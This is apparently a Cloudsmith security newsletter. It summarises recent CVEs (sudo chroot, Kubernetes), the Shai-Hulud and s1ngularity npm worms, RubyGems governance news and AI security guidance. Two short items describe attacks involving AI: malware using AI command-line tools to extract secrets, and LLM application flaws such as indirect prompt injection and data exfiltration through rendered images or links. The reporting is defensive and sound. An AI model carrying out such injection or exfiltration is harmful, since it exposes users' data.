This month, the software supply chain world was shaken by a major compromise in the NPM ecosystem. The Shai-Hulud malware campaign has dominated industry headlines, and while you’ve likely seen the coverage, we’re taking a closer look. The Cloudsmith team hosted a deep-dive webinar, “Lessons from the npm Attack: How to Secure Dependencies with Artifact Management” where they broke down what happened and shared actionable strategies to safeguard your software dependencies.
NPM isn’t the only story making waves in open source. From RubyGems maintainers being removed from GitHub, to new OpenSSF guidance on AI code assistants, and the upcoming Helm v4 release, the past few weeks have been packed with significant developments. We’ll cover all of these and more - but first, make sure to join our webinar and learn how to strengthen your defenses in the wake of the NPM breach.
Hijack sudo’s chroot option to run arbitrary commands as root NVD: CVE-2025-32463
CISA has added five actively exploited vulnerabilities, including a critical flaw in the Linux/Unix Sudo utility (CVE-2025-32463, CVSS 9.3), to its Known Exploited Vulnerabilities catalog. The Sudo bug allows local attackers to gain root access via the --chroot option, while other listed flaws affect Adminer, Cisco IOS/IOS XE, Fortra GoAnywhere MFT, and Libraesva ESG. Federal agencies must apply mitigations by October 20, 2025.
Bypass of Kubernetes API Server proxy TOCTOU NVD: CVE-2020-8562
Our first Kubernetes vulnerability allows authorised users to potentially access private control plane networks by exploiting DNS resolution behavior when proxying via Node or StorageClass objects. Rated Low severity, it affects all Kubernetes versions and currently has no fix. Mitigation involves using dnsmasq with caching options to prevent DNS response manipulation, while detection is limited to audit logs showing blocked connections.
This low severity Kubernetes security flaw allows attackers with permission to create or edit Endpoints or EndpointSlices to misuse LoadBalancers or Ingress to access backend IPs they shouldn’t, potentially bypassing NetworkPolicies. All versions are affected, and there is no patch - only mitigation by restricting write access to Endpoints/EndpointSlices and auditing services with empty selectors. Users should update RBAC roles accordingly and review Ingress configurations to reduce exposure.
With a CVSS score of 4.1 (Medium) this flaw affects all versions of Kubernetes kube-apiserver, where actors controlling webhook configurations can redirect requests to private networks and expose responses in logs if log level 10 is enabled. Systems are vulnerable if --profiling is enabled and attackers can access process logs. Mitigation involves disabling profiling (--profiling=false), reducing log level below 10, and restricting kube-apiserver’s network access. No fix is available; detection relies on reviewing kube-apiserver logs.
The official, stable release of Python 3.14 is out on October 7th 2025. This is the production-ready version that is suitable for all users. Python 3.14 brings a whole bunch of useful build improvements, which is unpacked in this blog post. Python versions 3.14 and onwards will no longer provide PGP signatures for release artifacts. Instead, Sigstore is recommended for verifiers. Similarly, free-threaded mode (PEP 703), which was introduced in the previous version, 3.13, has undergone major enhancements. Check out what’s new in Python 3.14.
Open Source Turmoil: RubyGems Maintainers Kicked Off GitHub Source: The New Stack
Ruby Central, the nonprofit steward of RubyGems, has sparked controversy by removing long-time volunteer maintainers from the project’s GitHub repositories and consolidating control under its staff. The move, explained as a response to fiduciary duty and security concerns over software supply chain risks, has been widely criticized by developers as a hostile takeover and a betrayal of community governance. Former maintainers, including Ellen Dash, condemned the loss of autonomy, while Ruby Central defended the action as temporary, citing legal liability, governance gaps, and the need for stronger security protocols. Despite promises of new agreements and improved communication, the decision has left the Ruby community divided and distrustful of the organization’s leadership.
CISA warned of a major npmjs.com supply chain attack involving the “Shai-Hulud” worm, which compromised over 500 packages by stealing developer credentials, exfiltrating them, and spreading rapidly through malicious package updates. The agency urged organisations to review dependencies, rotate credentials, enforce MFA, monitor for suspicious activity, block malicious domains, and strengthen GitHub security controls. If you’d like to learn more on this topic, check out our recent Cloudsmith webinar.
New attack vector emerged with ‘s1ngularity’ and ‘shai-hulud’ attacks Source: Cloudsmith
The Cloudsmith blog details the emergence of the “s1ngularity” and “Shai-Hulud” attacks, which mark a serious escalation in npm supply chain threats. Unlike earlier incidents driven by phishing, these attacks exploited a vulnerable GitHub Action to steal npm publishing tokens, enabling credential harvesting and data exfiltration. Alarmingly, they also represent one of the first documented uses of AI command-line tools to identify and extract sensitive data. To defend against such threats, Cloudsmith advises blocking known malicious packages, auditing exposure, quarantining via Enterprise Policy Management, rotating credentials, and strengthening CI/CD and identity security practices.
Kubernetes
Announcing Changed Block Tracking API support (alpha) Source: Kubernetes.io
Kubernetes now offers alpha support for Changed Block Tracking (CBT), a feature that lets CSI storage drivers track changes at the block level between volume snapshots. This enables faster, more efficient incremental backups by only processing changed blocks rather than entire volumes. Currently supported for block volumes, CBT requires storage providers to implement specific CSI RPCs and an external snapshot metadata sidecar, while backup solutions must handle authentication, streaming, and processing of metadata. The feature reduces backup time, resource usage, and storage costs for large datasets.
The first Alpha of Helm v4 has been released, marking the start of a development phase focused on stability while API-breaking changes may still occur. The Alpha period runs through September, inviting users and SDK developers to test features and provide feedback. October begins the Beta phase, concentrating on bug fixes and preparing for a stable release, with the first release candidate expected at the end of the month. The official Helm v4 release is planned for KubeCon NA 2025 in mid-November, six years after Helm v3 and ten years since Helm’s creation.
The Quiet Revolution in Kubernetes Security Source: Dark Reading
Kubernetes security is often hampered by legacy Linux assumptions (full-featured OSes, shells, and mutable filesystems) that increase attack surfaces and clash with ephemeral, container-native workloads. Talos Linux reimagines this with a minimal, immutable, API-driven OS designed for Kubernetes, eliminating local access, drift, and unnecessary complexity. While it strengthens security, it challenges traditional compliance tools and frameworks, requiring CISOs to adapt policies and auditing approaches. Ultimately, Talos aligns the OS layer with modern cloud-native principles, reducing risk and enabling fully auditable, declarative infrastructure.
How Maintainer Burnout Is Causing a Kubernetes Security Disaster Source: The New Stack
Kubernetes’ External Secrets Operator (ESO), a critical tool for securely managing secrets from external providers, is facing a severe crisis due to maintainer burnout. With only one active maintainer left, the project is essentially frozen. That means no updates, bug fixes, or security patches will be released until at least five maintainers step up. This exposes Kubernetes environments to potential security risks and highlights a growing problem in open source: vital projects often lack sustainable support, leaving critical infrastructure vulnerable unless the community actively intervenes.
AI, MLLs & MCP
New OpenSSF Guidance on AI Code Assistant Instructions Source: Open SSF
AI code assistants can accelerate development and suggest solutions, but they pose security risks because their outputs depend on user prompts and can include insecure code. To address this, the OpenSSF released the “Security-Focused Guide for AI Code Assistant Instructions,” created by experts from Microsoft, Google, Red Hat, and others. The guide emphasizes crafting clear, security-focused prompts to improve the correctness and safety of generated code. While AI assistants can still make mistakes, better prompts lead to more secure results. This guide is a practical resource, complemented by an upcoming OpenSSF course on safely using AI code assistants, helping developers harness AI to improve software security.
Whitepaper: A Practical Guide for Building Robust AI/ML Pipeline Security Source: OpenSSF
This OpenSSF whitepaper is exciting for developers because it marks a pivotal moment in extending the proven lessons of DevSecOps into the fast-growing world of AI/ML. Just as DevSecOps transformed software security by embedding protections directly into the development lifecycle, this paper introduces MLSecOps - a framework for integrating security into MLOps. By addressing the unique risks of AI/ML systems, such as model evolution, complexity, and opacity, it provides a roadmap for building trustworthy and resilient applications. The paper not only outlines a clear, layered approach but also leverages powerful open source tools like SLSA, Sigstore, and OpenSSF Scorecard, while highlighting future opportunities to close gaps in securing the AI/ML lifecycle. It’s a forward-looking guide that empowers developers to innovate with AI/ML confidently and securely.
Extending Supply Chain Governance to AI and ML Artifacts Source: Cloudsmith
Organisations are rapidly adopting ML models and datasets from public sources, but unmanaged AI artifacts introduce security, compliance, and governance risks in the software supply chain. Cloudsmith’s ML Model Registry treats models and datasets as first-class artifacts (versioned, audited, and policy-controlled), allowing teams to maintain integrity, trace provenance, and enforce compliance while integrating seamlessly with existing DevOps workflows, including Hugging Face. This approach enables faster AI-driven innovation without creating blind spots or unmanaged risk.
Practical LLM Security Advice from the NVIDIA AI Red Team Source: Nvidia Developer
Over several years, NVIDIA’s AI Red Team has identified common security risks in AI applications, especially LLM-based systems. The top vulnerabilities include: executing LLM-generated code without proper isolation, which can lead to remote code execution; insecure access control in retrieval-augmented generation (RAG) data stores, which can expose sensitive data or allow indirect prompt injection; and rendering active content from LLM outputs, which can exfiltrate data via images or links. Addressing these issues—by avoiding unsafe code execution, enforcing strict RAG permissions, and sanitizing or restricting active content—significantly improves LLM application security.
Catch Cloudsmith on the 2nd Floor of Gateway Pavilion! Learn how we can help you control your artifacts, secure your supply chain, and distribute software anywhere, all in one cloud-native platform. Fill out the form to request a discount pass or book a 1:1 meeting with our team.
Don’t let hidden threats slow you down. Discover how Cloudsmith & Kusari enable proactive security to prevent tampering, improve visibility, and speed deployments, ultimately reducing rework and strengthening your software supply chain. In this joint webinar from Cloudsmith and Kusari, our experts will show you how to turn security from a bottleneck into a force multiplier.
In this webinar, Cloudsmith experts Cristian Garcia and Gwen Burchell will analyze the recent npm supply chain attacks, including the 's1ngularity' and 'shai-hulud' incidents, to uncover critical lessons for securing open-source dependencies. They'll share practical strategies for reducing risk without slowing development, emphasizing the importance of proactive security measures throughout the software lifecycle.
If you missed our recent virtual webinar on vulnerability scoring systems, don’t worry - the session can be watched on-demand at the link provided above. This session helps developers and DevOps teams to think about the various existing scoring systems for vulnerabilities such as CVSS and EPSS as well as understanding how fixable vulnerabilities can be isolated and prioritised using Cloudsmith enterprise implementation of OPA.
Signed, sealed, and delivered - see you next issue.
